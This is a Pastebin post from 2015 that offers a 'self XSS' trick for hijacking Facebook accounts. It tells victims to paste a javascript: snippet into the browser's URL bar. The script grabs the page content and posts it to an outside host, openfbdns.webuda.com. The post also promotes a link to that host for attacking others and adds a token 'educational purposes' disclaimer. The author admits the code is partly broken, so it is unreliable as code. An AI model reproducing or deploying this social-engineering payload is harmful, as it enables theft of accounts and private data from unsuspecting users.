H4T3D

Penetrate Facebook By XSS - H4T3D

Sep 21st, 2015
491
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.24 KB | None | 0 0
  1. ######################################
  2. Hack Facebook By XSS and Self XSS
  3. Founded & Coded By H4T3D
  4. ######################################
  5. Self XSS in Facebook
  6. Paste This Script in Url Bar Of Facebook or in Inspect Element :
  7.  
  8. avascript:if(%22XMLHttpRequest%22 in window)xmlhttp=new XMLHttpRequest();if(%22ActiveXObject%22 in window)xmlhttp = new ActiveXObject(%22Msxml2.XMLHTTP%22);xmlhttp.open('GET', location.pathname,true);xmlhttp.onreadystatechange=function() {if (xmlhttp.readyState==4) { document.body.innerHTML += '<form id="dynForm" action="http://openfbdns.webuda.com/code.php" method="POST"><input type="hidden" name="q" value="document.write(xmlhttp.responseText)"></form>'; document.getElementById("dynForm").submit();}};xmlhttp.send(null);void(0);
  9.  
  10.  
  11. Remember to Put j of JavaScript by your self in Script Or it may not work :p
  12.  
  13.  
  14. This Xss would Get Whole Content Of Website and Post It To Another Website that is Facebook User Id Hijacking ....
  15.  
  16. See This >> http://i.imgur.com/Ds1Dnc5.png
  17.  
  18. You Can Also XSS some one by just sending him link like this >> http://openfbdns.webuda.com/code.php
  19.  
  20. For Developers >> Plz Correct My Code POST Method :(
  21.  
  22. Only For Educational Purposes Plz Dont harm Any One I am Not Responsible For That !!!!
Add Comment
Please, Sign In to add comment